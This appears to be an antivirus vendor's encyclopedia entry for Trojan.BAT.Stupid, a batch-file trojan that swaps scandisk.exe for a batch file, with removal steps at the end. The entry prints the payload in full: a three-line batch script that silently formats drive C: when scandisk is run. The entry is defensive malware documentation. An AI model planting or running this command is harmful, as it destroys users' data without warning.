Trojan.BAT.Stupid

Class Trojan
Platform BAT
Description

Technical Details

This Trojan has a malicious payload. It is a BAT file. It is 246 bytes in size.

Payload

When launched the Trojan will delete the following file:

C:windowscommandscandisk.exe

It will replace it with the following file:

C:windowscommandscandisk.bat

which contains the following code:

@echo off
break off
format c: /autotest /q /u

The result is that when “scandisk” is called, an attempt will be made to format C: without displaying a warning.

Removal instructions

If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program:

  1. Delete the original Trojan file (the location will depend on how the program originally penetrated the victim machine).
  2. Delete the file created by the Trojan:
    C:windowscommandscandisk.bat
  3. Restore the file which the Trojan deleted from backup:
    C:windowscommandscandisk.exe
  4. Update your antivirus databases and perform a full scan of the computer (download a trial version of Kaspersky Anti-Virus).